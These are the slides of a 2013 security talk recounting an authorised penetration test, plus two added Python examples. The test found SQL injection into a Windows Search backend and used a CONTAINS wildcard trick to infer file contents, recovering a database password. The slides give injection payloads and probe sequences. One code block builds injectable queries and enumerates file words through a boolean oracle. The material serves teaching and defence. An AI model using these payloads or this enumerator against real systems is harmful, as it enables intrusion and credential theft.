
Curious Case of SQLi


DESCRIPTION

These are the slides from the talk "Curious Case of SQLi" held as part of HackPra 2013 (Bochum, Germany, 11th December 2013) by Miroslav Štampar.


Page 1: Curious Case of SQLi

Miroslav Štampar

[email protected]

Page 2: Target (1)

• High profile (i.e. very important to be secure)
• It was a fancy new Web 2.0 site (lots of Javascript) – while it first appeared as a Flash site
• Very little user interaction (but lots of clicking)
• Automatic vulnerability scanners reported nothing more than the usual nagging (e.g. clickjacking possible, lack of security headers, etc.)
• Used Javascript libraries were up-to-date
• Custom Javascript parts were clean (e.g. no DOM based XSS, open redirections, etc.)

Page 3: Target (2)

• No user management (everybody is/was anonymous)
• Web server was up-to-date
• Only attack points susceptible to (malicious) user interaction were:
  ➢ Ajax call for user search (let's call it search.asp)
  ➢ Ajax call for search within categories (let's call it category.asp)
• Burp to the rescue

Page 4: Attack points (1) (screenshot only)

Page 5: Attack points (2) (screenshot only)

Page 6: Typical response (screenshot only)

Page 7: Day #1 (.1)

• First tests resulted only with #FAIL
• Trashing of values (e.g. foo\')><\"bar) resulted in prolonged HTTP error 500 responses (approx. 90 seconds before server timeout)
• '-- resulted with SQLi (response differentiation)
• '-- WAITFOR DELAY '0:0:5' resulted in immediate HTTP error 500 response
• Though, ' WAITFOR DELAY foobar resulted the same
• Usual stuff like ' AND 1=1-- and/or ' OR 2>1-- resulted in prolonged error responses too

Page 8: Day #1 (.2)

• Everything pointed to there being some kind of WAF involved (as said, high profile target)
• Colleagues told me to "just leave it"
• Boss told me that there is no hurry and that I can work on it as much as I want :)
• As a sqlmap developer I had an "obligation" to, at least try to, "break it"
• I told them that I need 1-2 more days to be 100% sure
• One of the first ideas was to write a SQLi fuzzer that would do the "monkey test" job

Page 9: Day #1 (.3)

• At the end of the working day, left sqlmap (over the night) to test all the parameters
• Turned on all possible boundary & payload combinations (--level=5 --risk=3)
• Hoped that something usable would turn out of it
• During commuting (local overcrowded bus) thought of all the stuff learned through the years
• ..., WAF bypass tricks, non-ASCII SQLi payloads, non-disclosed SQLi attacks, non-mainstream SQL statements (Love Thy Reference Manual), etc.

Page 10: Day #2 (.1)

• Tried literally everything in my knowledge domain
• Lots of delayed responses (very cumbersome)
• sqlmap was still running (still nothing)
• Almost quit (during the coffee break)
• Had a hard look once more into the original requests
• That ASC was "provoking" as hell
• Tried to Google in hope that something would turn out

Page 11: Day #2 (.2) (screenshot only)

Page 12: Day #2 (.3) (screenshot only)

Page 13: Day #2 (.4) (screenshot only)

Page 14: Day #2 (.5) (screenshot only)

Page 15: Day #2 (.6) (screenshot only)

Page 16: Day #2 (.7)

• Windows Search/Indexing Service can be SQL-ed
• Advanced Query Syntax (AQS) #FTW
• "AQS is the default query syntax used by Windows Search to query the index and to refine and narrow search parameters"
• A basic query searches for items that satisfy a restriction over a property
• Users can limit the scope of their searches to specific folder locations or data stores
• There is not a single reported case of SQLi

Page 17: Day #2 (.8) (screenshot only)

Page 18: Day #2 (.9) (screenshot only)

Page 19: Day #2 (.10) (screenshot only)

Page 20: Day #2 (.11) (screenshot only)

Page 21: Day #2 (.12) (screenshot only)

Page 22: Day #2 (.13) (screenshot only)

Page 23: Day #2 (.14) (screenshot only)

Page 24: Day #2 (.15)

• At the end of the day, summarized findings
• Columns of interest (SYSTEMINDEX catalog): System.ItemFolderPathDisplay, System.Filename, System.ItemPathDisplay, System.Size, System.FileOwner
• Some columns had interesting names, but appeared to be always empty (System.Author, System.Comment, System.ComputerName, System.Keywords, System.Subject, System.Title, etc.)

Page 25: Day #2 (.16)

• All in all, nothing special other than proof of SQLi and a complete file listing with (semi-)interesting attributes
• Went home and thought (again) in the overcrowded local bus "is that the best I can do?"
• That SQL/AQS was really limited (i.e. crippled)
• Nothing special is stored inside (other than the local file listing) from a security point of view
• "...or, wait a minute..."

Page 26: Day #2 (.17)

• There must be a way to search files by keywords (it's called Search for a reason)
• Came home and immediately read the whole reference manual
• Found a special operator: CONTAINS
• Using its wildcard functionality it should be possible to infer the content of files
• ...AND System.ItemPathDisplay='...' AND CONTAINS('""a*""')--

Page 27: Day #3 (.1)

• Manually tried the file content inference trick and it worked like a charm
• Usually, user permissions of the process running the search would pose a problem (e.g. if run with the default anonymous IIS account IUSR_<computer_name>)
• Administrator used an external VBS script, most probably because of simplicity and usability
• It was being run with different (more permissive) credentials
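How a helper like that ends up injectable, and what closes the hole, as an added example in Python (this is not the target's VBS script, and the query shape is a guess: a LIKE filter on System.FileName plus a user-controlled sort direction, assumed only from the ASC seen in the request). The hardened version treats the two injection positions differently, because they are different: the search term sits inside a string literal and can be quoted, while the sort direction sits in identifier position where no quoting helps and only a whitelist does.

```python
import re

# Added example: hypothetical reconstruction of a search helper that builds a
# Windows Search SQL statement for an AJAX endpoint, vulnerable form first.
# Query shape, column choice and the user-controlled direction are assumptions.

_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}   # the only two ORDER BY directions that exist
_MAX_TERM = 64                                  # hypothetical length cap for a search term


def build_query_naive(term: str, direction: str) -> str:
    """Vulnerable: both user values are concatenated straight into the SQL text.

    A term such as   x' AND CONTAINS('"a*"')--   turns the filename filter into a
    boolean oracle over file contents; a direction such as   ASC, System.Size
    rewrites the ORDER BY clause, since that position is never quoted at all.
    """
    return ("SELECT System.ItemPathDisplay, System.Size FROM SYSTEMINDEX "
            f"WHERE System.FileName LIKE '%{term}%' "
            f"ORDER BY System.FileName {direction}")


def sql_string_literal(value: str) -> str:
    """Quote a value as a SQL string literal by doubling embedded single quotes.

    Inside the literal, LIKE metacharacters (% and _) only widen the match; they
    cannot terminate the literal, so they are left to the search semantics.
    """
    return "'" + value.replace("'", "''") + "'"


def build_query_hardened(term: str, direction: str) -> str:
    """Same statement with the literal position quoted and the identifier position whitelisted."""
    if len(term) > _MAX_TERM or re.search(r"[\x00-\x1f]", term):
        raise ValueError("unacceptable search term")
    try:
        safe_direction = _DIRECTIONS[direction.strip().lower()]
    except KeyError:
        # Anything that is not exactly ASC/DESC is rejected, never "cleaned up".
        raise ValueError(f"unexpected sort direction: {direction!r}") from None
    pattern = sql_string_literal("%" + term + "%")
    return ("SELECT System.ItemPathDisplay, System.Size FROM SYSTEMINDEX "
            f"WHERE System.FileName LIKE {pattern} "
            f"ORDER BY System.FileName {safe_direction}")


if __name__ == "__main__":
    probe = "x' AND CONTAINS('\"a*\"')--"   # the slide-style payload, constructed
    print(build_query_naive(probe, "ASC"))
    print(build_query_hardened(probe, "ASC"))
```

Note that neither version touches the account the script runs under; the finding on this slide (a search process running with broader rights than the anonymous IIS user) is a separate fix, and the quoting above would only have reduced the injection, not the reach of a successful one.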

Page 28: Day #3 (.2)

• Retrieved a list of "all" local files (accessible by the searching VBS process)
• System directories were missing (e.g. C:\Windows & C:\Program Files)
• Out of the rest, directories that appeared especially interesting were: C:\Inetpub\wwwroot\foobar\Old & C:\Inetpub\wwwroot\foobar\Backup
• Inside both of those there was a web.config file
• Started implementing file content inference mechanism using CONTAINS

Page 29: Day #3 (.3) (screenshot only)

Page 30: Day #3 (.4)

• ..AND CONTAINS('""a*""').. (true)
• ..AND CONTAINS('""aa*""').. (false)
• ...
• ..AND CONTAINS('""ad*""').. (true)
• ..AND CONTAINS('""ada*""').. (false)
• ..AND CONTAINS('""adb*""').. (false)
• ..AND CONTAINS('""add*""').. (true)
• ..AND CONTAINS('""adda*""').. (false)
• ...
• ..AND CONTAINS('""add""').. (true)
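The probe sequence on this slide, generalised into the full enumeration it is one branch of, as an added example in Python (not the author's tool or sqlmap code). The oracle here is a local stand-in answering probes against a constructed sample string, so it runs offline; against a real target the same `contains` callback would send the payload from slide 26 and return the response-differentiation verdict. The payload format reproduces the doubled double quotes exactly as the slide shows them, and the alphabet and the sample content are assumptions.

```python
import re
import string

# Added example: word enumeration through a CONTAINS prefix oracle. Windows Search's
# CONTAINS matches whole indexed words and its wildcard is a trailing '*' (prefix
# match only), so what comes back is the set of words in a file, not their order.
ALPHABET = string.ascii_lowercase + string.digits   # assumed charset of the indexed words

# Constructed stand-in for one indexed file's content on the target (not real data).
SAMPLE_CONTENT = 'add name="sa" password="S3cret!" connectionString'


def injection_payload(path: str, term: str) -> str:
    """Value for the vulnerable parameter for one probe, in the form shown on slide 26."""
    return f"' AND System.ItemPathDisplay='{path}' AND CONTAINS('\"\"{term}\"\"')--"


class LocalOracle:
    """Offline stand-in for the target: answers probes the way the index would,
    case-insensitively, whole word for 'term' and prefix for 'term*'."""

    def __init__(self, content: str):
        # Crude word breaker (assumption): runs of letters/digits, lower-cased.
        self.words = set(re.findall(r"[a-z0-9]+", content.lower()))
        self.calls = 0   # one call = one HTTP request against a real target

    def contains(self, term: str) -> bool:
        self.calls += 1
        if term.endswith("*"):
            prefix = term[:-1]
            return any(w.startswith(prefix) for w in self.words)
        return term in self.words


def infer_words(contains, alphabet=ALPHABET, max_len=64):
    """Enumerate every indexed word of the file via prefix probes.

    Depth-first over prefixes: 'a*' true -> probe 'a' as a whole word, then push
    'aa', 'ab', ...; a false prefix prunes its whole subtree, which is what keeps
    the request count at (|alphabet| + 1) per matching prefix instead of a brute
    force over all strings.
    """
    found = set()
    stack = list(alphabet)
    while stack:
        prefix = stack.pop()
        if not contains(prefix + "*"):
            continue
        if contains(prefix):          # the slide's final probe: '""add""' without the star
            found.add(prefix)
        if len(prefix) < max_len:
            stack.extend(prefix + c for c in alphabet)
    return found


if __name__ == "__main__":
    oracle = LocalOracle(SAMPLE_CONTENT)
    words = infer_words(oracle.contains)
    print(sorted(words), "in", oracle.calls, "probes")
    print(injection_payload(r"C:\Inetpub\wwwroot\foobar\Backup\web.config", "add*"))
```

Two caveats a practitioner should keep in mind when running this for real. The result is a bag of words: a value like `S3cret!` comes back as `s3cret`, split and case-folded by the word breaker, so the attribute names around it (from the file's structure) are what tell you which word was the password. And the cost is dominated by the alphabet: every confirmed prefix costs one more probe per alphabet character, so narrowing the charset to what the file type can contain, and starting from likely prefixes, is what makes the run finish.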

Page 31: Day #3 (.5) (screenshot only)

Page 32: Day #3 (.6)

• Inference of a configuration file containing a sa password for a (local) SQL Server was a pretty good catch :)
• As said, the search process was constrained by the rights of the user it ran as (limiting wider exposure)
• There were no open ports other than 80 (e.g. port 1433 would have been great)
• There were no (exposed) administrator pages
• Called it a day and finished the test altogether

Page 33: Conclusion

• Use automatic vulnerability scanners only to get a "sense" of the target's security settings
• To get a deep understanding of the target's inner workings you'll always need to "get dirty"
• If you have a "hunch" stick with it
  • You'll most probably be wrong, but you'll learn a lot along the way
  • In case your "hunch" was right, you'll have an interesting story to tell (highly subjective opinion ;)

Page 34: Questions?